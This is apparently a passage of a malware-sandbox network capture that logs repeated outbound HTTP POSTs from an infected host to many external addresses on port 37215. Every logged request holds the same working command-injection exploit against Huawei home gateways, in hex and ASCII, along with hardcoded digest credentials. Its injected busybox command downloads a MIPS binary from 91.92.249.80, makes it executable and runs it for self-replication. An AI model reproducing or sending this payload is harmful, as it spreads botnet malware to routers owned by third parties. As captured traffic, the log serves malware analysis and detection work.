                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          468192.168.2.233393668.189.74.7637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190309048 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          469192.168.2.235163241.84.133.21337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190367937 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          470192.168.2.2360412157.213.239.10537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190368891 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          471192.168.2.234824441.78.7.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190385103 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          472192.168.2.2349110197.135.176.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190387964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          473192.168.2.2356690157.152.4.11437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190422058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          474192.168.2.2346658157.8.255.17537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190442085 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          475192.168.2.235122641.27.37.16337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190445900 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          476192.168.2.235785441.131.143.20537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190457106 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          477192.168.2.2346636197.118.11.837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.190469980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
